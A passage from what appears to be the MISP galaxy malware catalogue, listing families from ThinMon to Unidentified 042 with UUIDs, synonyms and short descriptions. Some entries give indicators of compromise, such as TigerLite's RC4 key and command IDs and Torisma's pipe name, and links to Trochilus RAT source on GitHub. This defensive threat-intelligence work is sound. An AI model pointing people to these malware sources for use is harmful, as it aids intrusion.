UUID a416e88b-8fc0-41a9-bb2e-13cbcc5f22b0 which can be used as unique global reference for ThinMon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ThreeByte

Internal MISP references

UUID d1752bcb-d9cb-4b4b-81f0-0658d76b4ce4 which can be used as unique global reference for ThreeByte in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ThumbThief

Internal MISP references

UUID 1df3b58a-e5d2-4d2a-869c-8d4532cc9f52 which can be used as unique global reference for ThumbThief in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ThunderX

Ransomware.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ThunderX.

Known Synonyms
`Ranzy Locker`

Internal MISP references

UUID e4be8d83-748e-46df-8dd7-0ce1b2255f36 which can be used as unique global reference for ThunderX in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Thunker

Internal MISP references

UUID e55dcdec-0365-4ee0-96f8-7021183845a3 which can be used as unique global reference for Thunker in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.thunker - webarchive

Associated metadata

Metadata key	Value
type	[]

Tidepool

Internal MISP references

UUID 8e7cdcc2-37e1-4927-9c2d-eeb3050c4fca which can be used as unique global reference for Tidepool in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TigerLite

TigerLite is a TCP downloader.

It creates mutexes like "qtrgads32" or "Microsoft32".

It uses RC4 with the key "MicrosoftCorporationValidation@#$%^&*()!US" for decryption of its character strings, and a custom algorithm for encryption and decryption of network traffic.

It supports from 5 up to 8 commands with the following identifiers: 1111, 1234, 2099/3333, 4444, 8877, 8888, 9876, 9999. The commands mostly perform various types of execution - either of code received from the server, or native Windows commands, with their output collected and sent back to the server.

TigerLite is an intermediate step of a multi-stage attack, in which Tiger RAT is usually the next step. This malware was observed in attacks against South Korean entities in H1 2021.

Internal MISP references

UUID 1fcd1afe-31ed-40c2-9262-6a6afe2a43e9 which can be used as unique global reference for TigerLite in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Tiger RAT

This is third stage backdoor mentioned in the Kaspersky blog, "Andariel evolves to target South Korea with ransomware". The third stage payload was created via the second stage payload, is interactively executed in the operation and exists in both x64 and x86 versions. Most of them use Internet Explorer or Google Chrome icons and corresponding file names to disguise themselves as legitimate internet browsers. The malware decrypts the embedded payload at runtime. It uses an embedded 16-byte XOR key to decrypt the base64 encoded payload. The decrypted payload is another portable executable file that runs in memory. Before getting decrypted with a hardcoded XOR key, the backdoor also checks for sandbox environment. The backdoor has some code overlap with a know malware family PEBBLEDASH, attributed to Lazarus/LABYRINTH CHOLLIMA.

Internal MISP references

UUID 57c0d7b4-f46b-44bf-9430-75ac7d3cf2df which can be used as unique global reference for Tiger RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

tildeb

Standalone implant. Potentially tied to a framework called PATROLWAGON.

Internal MISP references

UUID 8e846ea0-a46d-47c9-96e9-1cdefd49a846 which can be used as unique global reference for tildeb in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Tinba

F-Secure notes that TinyBanker or short Tinba is usually distributed through malvertising (advertising content that leads the user to sites hosting malicious threats), exploit kits and spam email campaigns. According to news reports, Tinba has been found targeting bank customers in the United States and Europe.

If Tinba successfully infects a device, it can steal banking and personal information through webinjects. To do this, the malware monitors the user's browser activity and if specific banking portals are visited, Tinba injects code to present the victim with fake web forms designed to mimic the legitimate web site. The malware then tricks them into entering their personal information, log-in credentials, etc in the legitimate-looking page.

Tinba may also display socially-engineered messages to lure or pressure the user into entering their information on the fake page; for example, a message may be shown which attempts to convince the victim that funds were accidentally deposited to his account and must be refunded immediately.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Tinba.

Known Synonyms
`Illi`
`TinyBanker`
`Zusy`

Internal MISP references

UUID 5eee35b6-bd21-4b67-b198-e9320fcf2c88 which can be used as unique global reference for Tinba in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TinyFluff

TinyFluff is a dropper developed by the OldGremlin group. In one of their March '22 campaigns, TinyFluff included a JavaScript RAT with a time-independent DGA.

Internal MISP references

UUID e044c397-8491-466b-adb7-2deead4d9eb6 which can be used as unique global reference for TinyFluff in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TinyLoader

Internal MISP references

UUID f7c26ca7-0a7b-41b8-ad55-06625be10144 which can be used as unique global reference for TinyLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TinyMet

TinyMet is a meterpreter stager.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TinyMet.

Known Synonyms
`TiniMet`

Internal MISP references

UUID 075c6fa0-e670-4fe1-be8b-b8b13714cb58 which can be used as unique global reference for TinyMet in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TinyNuke

TinyNuke (aka Nuclear Bot) is a fully-fledged banking trojan including HiddenDesktop/VNC server and a reverse socks4 server. It was for sale on underground marketplaces for $2500 in 2016. The program's author claimed the malware was written from scratch, but that it functioned similarly to the ZeuS banking trojan in that it could steal passwords and inject arbitrary content when victims visited banking Web sites. However, he then proceeded to destroy his own reputation on hacker forums by promoting his development too aggressively. As a displacement activity, he published his source code on Github. XBot is an off-spring of TinyNuke, but very similar to its ancestor.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TinyNuke.

Known Synonyms
`MicroBankingTrojan`
`Nuclear Bot`
`NukeBot`
`Xbot`

Internal MISP references

UUID 5a78ec38-8b93-4dde-a99e-0c9b77674838 which can be used as unique global reference for TinyNuke in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TinyTurlaNG

Cisco Talos states that TinyTurla-NG is a small “last chance” backdoor that is left behind to be used when all other unauthorized access/backdoor mechanisms have failed or been detected on the infected systems. TinyTurla-NG was seen as early as December 2023 targeting a Polish non-governmental organization (NGO) working on improving Polish democracy and supporting Ukraine during the Russian invasion.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TinyTurlaNG.

Known Synonyms
`TTNG`

Internal MISP references

UUID 1b560d5a-1335-4a28-b50f-1d0a7bbbbf80 which can be used as unique global reference for TinyTurlaNG in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TinyTyphon

Internal MISP references

UUID d2414f4a-1eda-4d80-84d3-ed130ca14e3c which can be used as unique global reference for TinyTyphon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TinyZbot

Internal MISP references

UUID b933634f-81d0-41ef-bf2f-ea646fc9e59c which can be used as unique global reference for TinyZbot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TinyTurla

Talos describes this as a malware family with very scoped functionality and thus a small code footprint, likely used as a second chance backdoor.

Internal MISP references

UUID e1fa6d45-4ac9-4ace-98a9-e21947f0e497 which can be used as unique global reference for TinyTurla in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Tiop

Internal MISP references

UUID c34091df-0df2-4ef6-bf69-c67eb711f6d8 which can be used as unique global reference for Tiop in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.tiop - webarchive

Associated metadata

Metadata key	Value
type	[]

TitanStealer

The stealer is written in Go and capable of stealing a variety of information from infected Windows machines, including credential data from browsers and crypto wallets, FTP client details, screenshots, system information, and grabbed files.

Internal MISP references

UUID 0a98f387-885e-4ad4-b5ab-686f4c06dcf1 which can be used as unique global reference for TitanStealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Tmanger

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Tmanger.

Known Synonyms
`LuckyBack`

Internal MISP references

UUID 8d7108fe-65be-4853-945d-1d5376dbaa34 which can be used as unique global reference for Tmanger in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Tofsee

According to PCrisk, Tofsee (also known as Gheg) is a malicious Trojan-type program that is capable of performing DDoS attacks, mining cryptocurrency, sending emails, stealing various account credentials, updating itself, and more.

Cyber criminals mainly use this program as an email-oriented tool (they target users' email accounts), however, having Tofsee installed can also lead to many other problems.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Tofsee.

Known Synonyms
`Gheg`

Internal MISP references

UUID 53e617fc-d71e-437b-a1a1-68b815d1ff49 which can be used as unique global reference for Tofsee in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TokyoX

Internal MISP references

UUID ad23afb8-cfce-4e43-b73f-58ca20fa0afe which can be used as unique global reference for TokyoX in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

tomiris

Internal MISP references

UUID a5449893-ab06-419b-bb31-4ce16503dcd9 which can be used as unique global reference for tomiris in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TONEDEAF

TONEDEAF is a backdoor that communicates with Command and Control servers using HTTP or DNS. Supported commands include system information collection, file upload, file download, and arbitrary shell command execution. When executed, this variant of TONEDEAF wrote encrypted data to two temporary files – temp.txt and temp2.txt – within the same directory of its execution.

Internal MISP references

UUID 77e29e3a-d4a3-4692-b1f8-38ad6dc1af1d which can be used as unique global reference for TONEDEAF in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TONERJAM

According to Symantec, Grager was deployed against three organizations in Taiwan, Hong Kong, and Vietnam in April 2024. Analysis of the backdoor revealed that it used the Graph API to communicate with a C&C server hosted on Microsoft OneDrive. Grager was downloaded from a typosquatted URL mimicking the open-source file archiver 7-Zip.

Internal MISP references

UUID a52be1e0-eb2b-4115-9f14-9e822341210b which can be used as unique global reference for TONERJAM in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TONESHELL

Internal MISP references

UUID 83bfa615-a1d4-4b61-bda0-beb560d24a97 which can be used as unique global reference for TONESHELL in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Tonnerre

Internal MISP references

UUID a7590aa5-d9fb-449f-8a5e-5233077b736e which can be used as unique global reference for Tonnerre in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Topinambour

Internal MISP references

UUID fcc49738-f801-47ff-977b-9e368bc85273 which can be used as unique global reference for Topinambour in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Torisma

Torisma is a complex HTTP(S) downloader, that can serve as an orchestrator handling the execution of additional payloads from the C&C server.

It uses VEST-32 for encryption and decryption of network traffic between the client and the server.

Typically, it uses these parameter names for its HTTP POST requests: ACTION, CODE, CACHE, REQUEST, RES. It sends the victim's MAC address in the initial request.

The response of the server informing the client about a successful authentication is "Your request has been accepted. ClientID: {f9102bc8a7d81ef01ba}". The client then requests additional data from the server, that decrypts to shellcode and its data parameters, and is executed. The client also creates a named pipe, \.\pipe\fb4d1181bb09b484d058768598b, that allows inter-process communication with the executed shellcode.

Torisma was usually downloaded by NedDnLoader, and deployed in the Operation DreamJob campaigns starting around Q4 2019.

Internal MISP references

UUID 69860c07-2acb-4674-8e68-41a1d8fe958a which can be used as unique global reference for Torisma in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TorrentLocker

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TorrentLocker.

Known Synonyms
`Teerac`

Internal MISP references

UUID 7f6cd579-b021-4896-80da-fcc07c35c8b2 which can be used as unique global reference for TorrentLocker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TorLoader

Downloader, delivered via a lure with fake exploits published on Github.

Internal MISP references

UUID b6c84477-198f-42ea-808b-e20b23271cd0 which can be used as unique global reference for TorLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TOUCHMOVE

Internal MISP references

UUID 39ecb19e-790b-475b-85db-ef4c7f9c9dce which can be used as unique global reference for TOUCHMOVE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TOUCHSHIFT

Internal MISP references

UUID accbbc7e-43f1-4232-90be-6c1fe90cbccf which can be used as unique global reference for TOUCHSHIFT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ToxicEye

ToxicEye is a ransomware that spreads through phishing emails. The malware encrypts system files with AES-256 and demands a ransom in Bitcoin.

Internal MISP references

UUID 0d445373-d520-4b67-9066-72f23452c774 which can be used as unique global reference for ToxicEye in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TransBox

According to Trend Micro, this is a backdoor abusing the Dropbox API, used by threat actor Earth Yako.

Internal MISP references

UUID e4d4af34-835a-4e39-b9e2-eb2456e5fce3 which can be used as unique global reference for TransBox in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

tRat

tRat is a modular RAT written in Delphi and has appeared in campaigns in September and October of 2018.

Internal MISP references

UUID b9e6e4bd-57e8-44e7-853c-8dcb83c26079 which can be used as unique global reference for tRat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TreasureHunter

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TreasureHunter.

Known Synonyms
`huntpos`

Internal MISP references

UUID f9d85edd-caa9-4134-9396-4575e70b10f2 which can be used as unique global reference for TreasureHunter in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TrickBot

A financial Trojan believed to be a derivative of Dyre: the bot uses very similar code, web injects, and operational tactics. Has multiple modules including VNC and Socks5 Proxy. Uses SSL for C2 communication.

Q4 2016 - Detected in wild Oct 2016 - 1st Report 2017 - Trickbot primarily uses Necurs as vehicle for installs. Jan 2018 - Use XMRIG (Monero) miner Feb 2018 - Theft Bitcoin Mar 2018 - Unfinished ransomware module Q3/4 2018 - Trickbot starts being spread through Emotet.

Infection Vector 1. Phish > Link MS Office > Macro Enabled > Downloader > Trickbot 2. Phish > Attached MS Office > Macro Enabled > Downloader > Trickbot 3. Phish > Attached MS Office > Macro enabled > Trickbot installed

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TrickBot.

Known Synonyms
`TheTrick`
`TrickLoader`
`Trickster`

Internal MISP references

UUID c824813c-9c79-4917-829a-af72529e8329 which can be used as unique global reference for TrickBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Trigona

According to PCrisk, Trigona is ransomware that encrypts files and appends the "._locked" extension to filenames. Also, it drops the "how_to_decrypt.hta" file that opens a ransom note. An example of how Trigona renames files: it renames "1.jpg" to "1.jpg._locked", "2.png" to "2.png._locked", and so forth.

It embeds the encrypted decryption key, the campaign ID, and the victim ID in the encrypted files.

Internal MISP references

UUID d5e900b0-5a6d-4e29-ab64-fa72863198a1 which can be used as unique global reference for Trigona in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Triton

Malware attacking commonly used in Industrial Control Systems (ICS) Triconex Safety Instrumented System (SIS) controllers.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Triton.

Known Synonyms
`HatMan`
`Trisis`

Internal MISP references

UUID 79606b2b-72f0-41e3-8116-1093c1f94b15 which can be used as unique global reference for Triton in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Trochilus RAT

Trochilus is a C++ written RAT, which is available on GitHub. GitHub Repo: - https://github.com/m0n0ph1/malware-1/tree/master/Trochilus - https://github.com/5loyd/trochilus

Internal MISP references

UUID 1c3ee140-8c47-4aa7-9723-334ccd886c4e which can be used as unique global reference for Trochilus RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Troldesh

According to Malwarebyte, Ransomware is a type of malware that prevents users from accessing their system or personal files and demands ransom payment in order to regain access. Ransom.Troldesh is spread by malspam, typically in the form of attached .zip files. This ransomware sometimes uses a CMS on a compromised site to host downloads.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Troldesh.

Known Synonyms
`Shade`

Internal MISP references

UUID 41acd50d-e602-41a9-85e7-c091fb4bc126 which can be used as unique global reference for Troldesh in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Troll Stealer

Internal MISP references

UUID 83052e07-0022-467a-a047-fb2fcec3a870 which can be used as unique global reference for Troll Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TroubleGrabber

Internal MISP references

UUID 183fa14a-f42a-4508-b146-8550ba1acf2a which can be used as unique global reference for TroubleGrabber in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

troystealer

Internal MISP references

UUID 36d7dea1-6abf-41ea-bcd8-079f24dc0972 which can be used as unique global reference for troystealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Trump Ransom

Internal MISP references

UUID 48deadcc-1a67-442d-b181-fdaaa337c4bb which can be used as unique global reference for Trump Ransom in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.trump_ransom - webarchive

Associated metadata

Metadata key	Value
type	[]

Tsifiri

Internal MISP references

UUID 3da6f62c-9e06-4e7b-8852-7c7689f65833 which can be used as unique global reference for Tsifiri in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.tsifiri - webarchive

Associated metadata

Metadata key	Value
type	[]

TUNNELFISH

Internal MISP references

UUID 561910ea-d165-48ea-9144-1c2d0cab3caa which can be used as unique global reference for TUNNELFISH in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TunnelSpecter

Internal MISP references

UUID 339e7cba-5934-4fdb-8e98-739813927011 which can be used as unique global reference for TunnelSpecter in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Tuoni

According to its Github repo, Tuoni is a sophisticated, cross-platform red teaming framework designed to enhance cybersecurity education and training through large-scale cyber defense exercises. Developed using Java for robustness, Docker for versatility, and featuring an intuitive web browser interface, it supports and streamlines cyber exercises. With its modular, extendable plugin system, Tuoni offers Red Teamers the flexibility to tailor its capabilities for specific educational and exercise needs. Its user-friendly interface facilitates easy operation and efficient reporting, essential in training environments. Tuoni embodies a commitment to power, adaptability, and collaboration, aimed at empowering Red Teamers with a tool that meets the dynamic demands of modern cyber defense education.

Internal MISP references

UUID b2721b97-cbe8-4883-803a-814525ff5cac which can be used as unique global reference for Tuoni in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

turian

According to Mitre, Turian is a backdoor that has been used by BackdoorDiplomacy to target Ministries of Foreign Affairs, telecommunication companies, and charities in Africa, Europe, the Middle East, and Asia. First reported in 2021, Turian is likely related to Quarian, an older backdoor that was last observed being used in 2013 against diplomatic targets in Syria and the United States.

Internal MISP references

UUID 69585b58-ec98-4a70-b61d-288d5a7ca7c3 which can be used as unique global reference for turian in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Turkojan

Internal MISP references

UUID 17f9e595-c7c2-448a-a48a-6079e4c5791a which can be used as unique global reference for Turkojan in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TurlaRPC

Internal MISP references

UUID 8c6248d2-2b3a-4fe8-99cd-552077e3f84f which can be used as unique global reference for TurlaRPC in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Turla SilentMoon

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Turla SilentMoon.

Known Synonyms
`BigBoss`
`Cacao`
`GoldenSky`
`HyperStack`

Internal MISP references

UUID ddee7f00-66e0-4d89-bd51-4b0df516a248 which can be used as unique global reference for Turla SilentMoon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TURNEDUP

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TURNEDUP.

Known Synonyms
`Notestuk`

Internal MISP references

UUID fab34d66-5668-460a-bc0f-250b9417cdbf which can be used as unique global reference for TURNEDUP in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TYPEFRAME

TYPEFRAME is a RAT.

It supports ~25 commands that include operations on the victim’s filesystem, manipulation with its configuration, modification of the system's firewall, the download and execution of additional tools from the attacker’s C&C and the uninstall via a self-delete batch. The commands are indexed by 16-bit integers, starting with the value 0x8000.

The RAT uses RC4 for decryption of its binary configuration. It has a statically linked OpenSSL 0.9.8k library used for SSL communication.

Internal MISP references

UUID bcc18617-5310-47f0-be30-e2fef6252359 which can be used as unique global reference for TYPEFRAME in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

TypeHash

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TypeHash.

Known Synonyms
`SkinnyD`

Internal MISP references

UUID d7b0ccc8-051c-4ab1-908e-3bd1811d9e2e which can be used as unique global reference for TypeHash in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Typhon Stealer

According to PCrisk, Typhon is a stealer-type malware written in the C# programming language. Newer versions of this program are called Typhon Reborn (TyphonReborn). Malware within this classification is designed to extract data from infected systems. The older variants of Typhon have a broader range of functionalities, while Typhon Reborn versions are streamlined stealers.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Typhon Stealer.

Known Synonyms
`Typhon Reborn V2`

Internal MISP references

UUID fb5e364c-0f91-4b35-89cc-52eb4fc2a338 which can be used as unique global reference for Typhon Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Tyupkin

Internal MISP references

UUID c28e9055-b656-4b7a-aa91-fe478a83fe4c which can be used as unique global reference for Tyupkin in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

T-Cmd

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular T-Cmd.

Known Synonyms
`t_cmd`

Internal MISP references

UUID 892aa73e-7cb5-4eb5-bcb7-e9864bd03af2 which can be used as unique global reference for T-Cmd in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

T-RAT 2.0

Internal MISP references

UUID fb9e9ade-b154-43ba-a0ea-550322454acf which can be used as unique global reference for T-RAT 2.0 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

UACMe

A toolkit maintained by hfiref0x which incorporates numerous UAC bypass techniques for Windows 7 - Windows 10. Typically, components of this tool are stripped out and reused by malicious actors.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular UACMe.

Known Synonyms
`Akagi`

Internal MISP references

UUID ccde5b0d-fe13-48e6-a6f4-4e434ce29371 which can be used as unique global reference for UACMe in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

UDPoS

Internal MISP references

UUID 5d05d81d-a0f8-496d-9a80-9b04fe3019fc which can be used as unique global reference for UDPoS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

UFR Stealer

Information stealer.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular UFR Stealer.

Known Synonyms
`Usteal`

Internal MISP references

UUID a24bf6d9-e177-44f2-9e61-8cf3566e45eb which can be used as unique global reference for UFR Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Uiwix

Internal MISP references

UUID 5e362cd1-bc5c-4225-b820-00ec7ebebadd which can be used as unique global reference for Uiwix in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Umbral

Umbral is a data-stealing Trojan that targets Windows systems. It spreads through phishing emails and malicious attachments. Once installed, Umbral can steal a variety of data, including usernames, passwords, online banking credentials, and confidential files. It can also change computer settings and execute harmful commands. Umbral is a serious security threat and should be removed immediately if found.

Internal MISP references

UUID 449a8708-d0ec-40c8-af7c-ea6960d11659 which can be used as unique global reference for Umbral in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

UnderminerEK

Internal MISP references

UUID 788b5c01-6609-4a3e-8922-5734fb6897b4 which can be used as unique global reference for UnderminerEK in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 001

Internal MISP references

UUID 72961adc-ace1-4593-99f1-266119ddeccb which can be used as unique global reference for Unidentified 001 in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_001 - webarchive

Associated metadata

Metadata key	Value
type	[]

Unidentified 003

Internal MISP references

UUID 0e435b5d-37df-47cc-a1c4-1afb82df83d1 which can be used as unique global reference for Unidentified 003 in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_003 - webarchive

Associated metadata

Metadata key	Value
type	[]

Unidentified 006

Internal MISP references

UUID c0a40d42-33bb-4eca-8121-f636aeec14c6 which can be used as unique global reference for Unidentified 006 in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_006 - webarchive

Associated metadata

Metadata key	Value
type	[]

Unidentified 013 (Korean)

Internal MISP references

UUID b1cc4c79-30a5-485d-bd7f-8625c1cb5956 which can be used as unique global reference for Unidentified 013 (Korean) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 020 (Vault7)

Internal MISP references

UUID 40c66571-164c-4050-9c84-f37c9cd84055 which can be used as unique global reference for Unidentified 020 (Vault7) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 022 (Ransom)

Internal MISP references

UUID 5424d89e-1b7a-4632-987b-67fd27621d6f which can be used as unique global reference for Unidentified 022 (Ransom) in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_022_ransom - webarchive

Associated metadata

Metadata key	Value
type	[]

Unidentified 023

Internal MISP references

UUID a936a595-f03d-4d8c-848e-2a3525c0415b which can be used as unique global reference for Unidentified 023 in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_023 - webarchive

Associated metadata

Metadata key	Value
type	[]

Unidentified 024 (Ransomware)

Internal MISP references

UUID acf6c476-847c-477a-b640-18a5c99e3c2b which can be used as unique global reference for Unidentified 024 (Ransomware) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 025 (Clickfraud)

Internal MISP references

UUID f43a0e38-2394-4538-a123-4a0457096058 which can be used as unique global reference for Unidentified 025 (Clickfraud) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 028

Internal MISP references

UUID 22a686d8-dd35-4a29-9437-b0ce7b5c204b which can be used as unique global reference for Unidentified 028 in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_028 - webarchive

Associated metadata

Metadata key	Value
type	[]

Unidentified 029

Internal MISP references

UUID aff47054-7130-48ca-aa2c-247bdf44f180 which can be used as unique global reference for Unidentified 029 in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_029 - webarchive

Associated metadata

Metadata key	Value
type	[]

Unidentified 030 (Ransomware)

Unnamed ransomware that camouflages as a program performing system cleanup called "System Analyzer Pro".

Internal MISP references

UUID 7287a0b0-b943-4007-952f-07b9475ec184 which can be used as unique global reference for Unidentified 030 (Ransomware) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 031

Internal MISP references

UUID 122c1c9c-3131-4014-856c-7e8a0da57a6e which can be used as unique global reference for Unidentified 031 in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_031 - webarchive

Associated metadata

Metadata key	Value
type	[]

Unidentified 037

Internal MISP references

UUID d073f9e5-8aa8-4e66-ba47-f332759199a2 which can be used as unique global reference for Unidentified 037 in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_037 - webarchive

Associated metadata

Metadata key	Value
type	[]

Unidentified 038

Internal MISP references

UUID d53e96c5-abfa-4be4-bb33-0a898c5aff58 which can be used as unique global reference for Unidentified 038 in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_038 - webarchive

Associated metadata

Metadata key	Value
type	[]

Unidentified 039

Internal MISP references

UUID 97c1524a-c052-49d1-8770-14b513d8a830 which can be used as unique global reference for Unidentified 039 in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_039 - webarchive

Associated metadata

Metadata key	Value
type	[]

Unidentified 041

Internal MISP references

UUID 88d70171-fc89-44d1-8931-035c0b095247 which can be used as unique global reference for Unidentified 041 in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_041 - webarchive

Associated metadata

Metadata key	Value
type	[]

Unidentified 042

Internal MISP references

UUID 168bf2a1-45a5-41ac-b364-5740e7ce9757 which can be used as unique global reference for Unidentified 042 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
